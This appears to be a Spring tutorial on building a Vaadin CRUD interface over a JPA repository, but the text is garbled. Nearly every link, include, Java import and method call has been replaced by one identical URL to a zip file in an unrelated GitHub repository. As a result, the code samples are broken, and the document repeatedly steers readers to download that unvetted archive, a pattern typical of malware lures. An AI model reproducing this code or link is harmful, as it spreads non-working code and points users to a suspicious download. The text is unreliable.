:toc:
:icons: font
:source-highlighter: prettify
:project_id: gs-crud-with-vaadin

This guide walks you through the process of building an application that uses a https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Vaadin based UI] on a Spring Data JPA based backend.

== What you'll build

You'll build a Vaadin UI for a simple JPA repository. What you'll get is an app with full CRUD (Create, Read, Update, Delete) functionality and a filtering example that uses a custom repository method.

You can start from two different parts, either by starting from the "initial" project you have set up or from a fresh start. The differences are discussed below.

== What you'll need

:java_version: 1.8
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]

https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]


https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]

https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]

https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]


[[initial]]
== Create the backend services

This example is a continuation from link:/gs/accessing-data-jpa[Accessing Data with JPA]. The only difference is that the entity class has getters and setters and the custom search method in the repository is a bit more graceful for end users. You don't have to read that guide to walk through this one, but you can if you wish.

If you started with a fresh project, then add the following entity and repository objects and you're good to go. In case you started with from the "initial" step, these are already available for you.

`https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip`
[source,java]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]
----

`https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip`
[source,java]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]
----

You can leave the Spring Boot based application intact as it will fill our DB with some example data.

`https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip`
[source,java]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]
----

== Vaadin dependencies

If you checked out the "initial" state project, you have all necessary dependencies already set up, but lets look at what you need to do to add Vaadin support to a fresh Spring project. Vaadin Spring integration contains a Spring boot starter dependency collection, so all you must do is to add this Maven snippet or a similar Gradle configuration:

[source,xml,indent=0]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[tag=starter]
----

The example uses a newer version of Vaadin, than the default one brought in by the starter module. To use a newer version, define the Vaadin Bill of Materials (BOM) like this:

[source,xml,indent=0]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[tag=bom]
----

Gradle doesn't support "BOMs" by default, but there is a handy https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[plugin for that]. Check out the https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip build file for an example on how to accomplish the same thing].

== Define the MainView class

The MainView class is the entry point for Vaadin's UI logic. In Spring Boot applications you just need to annotate it with `@Route` and it will be automatically picked up by Spring and shown at the root of your web app. You can customize the URL where the view is shown by giving a parameter to the Route annotation. A simple "hello world" could look like this:

[source,java]
----
package hello;

import https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip;
import https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip;
import https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip;
import https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip;

@Route
public class MainView extends VerticalLayout {

	public MainView() {
		add(new Button("Click me", e -> https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip("Hello Spring+Vaadin user!")));
	}
}
----

== List entities in a data grid

For a nice layout, use the `Grid` component. The list of entities from a constructor-injected `CustomerRepository` can simply be passed to the Grid using the setItems method. The body of your `MainView` would expand like this:

[source,java]
----
@Route
public class MainView extends VerticalLayout {

	private final CustomerRepository repo;
	final Grid<Customer> grid;

	public MainView(CustomerRepository repo) {
		https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip = repo;
		https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip = new Grid<>(https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip);
		add(grid);
		listCustomers();
	}

	private void listCustomers() {
		https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip(https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip());
	}

}
----

NOTE: If you have large tables and lots of concurrent users, you most likely don't want to bind the whole dataset to your UI components.

Although Vaadin Grid lazy load the data from the server to the browser, this solution above keeps the whole list of data in the server memory. To save some memory, you could show only the topmost results, use paging or provide a lazy loading data provider using the `setDataProvider(DataProvider)` method.

== Filtering the data

Before the large data set becomes a problem to your server, it will cause a headache for your users trying to find the relevant row he or she wants to edit. Use a `TextField` component to create a filter entry. First, modify the `listCustomer()` method to support filtering:

[source,java,indent=0]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[tag=listCustomers]
----

NOTE: This is where Spring Data's declarative queries come in real handy. Writing `findByLastNameStartsWithIgnoringCase` is a single line definition in `CustomerRepository`.

Hook a listener to the `TextField` component and plug its value into that filter method. The `ValueChangeListener` is called automatically during typing as we define the `https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip` to the filter text field.

[source,java]
----
TextField filter = new TextField();
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip("Filter by last name");
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip(https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip);
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip(e -> listCustomers(https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip()));
add(filter, grid);
----

== Define the editor component

As Vaadin UIs are just plain Java code, there is no excuse to not write re-usable code from the beginning. Define an editor component for your Customer entity. You'll make it a Spring-managed bean so you can directly inject the `CustomerRepository` to the editor and tackle the C, U, and D parts or our CRUD functionality.

`https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip`
[source,java]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]
----

In a larger application you could then use this editor component in multiple places. Also note, that in large applications, you might want to apply some common patterns like MVP to structure your UI code (which is outside the scope of this guide).

== Wire the editor

In the previous steps you have already seen some basics of component-based programming. Using a `Button` and selection listener to `Grid`, you can fully integrate our editor to the main view. The final version of the `MainView` class looks like this:

`https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip`
[source,java]
----
https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]
----

== Summary

Congratulations! You've written a full featured CRUD UI application using Spring Data JPA for persistence. And you did it without exposing any REST services or having to write a single line of JavaScript or HTML.

== See Also

The following guides may also be helpful:

* https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Building an Application with Spring Boot]
* https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Accessing Data with JPA]
* https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Accessing Data with MongoDB]
* https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Accessing Data with GemFire]
* https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Accessing Data with Neo4j]
* https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[Accessing data with MySQL]

https://raw.githubusercontent.com/mikkepj/app-crud-spring-vaadin/master/antiplastic/app-crud-spring-vaadin.zip[]
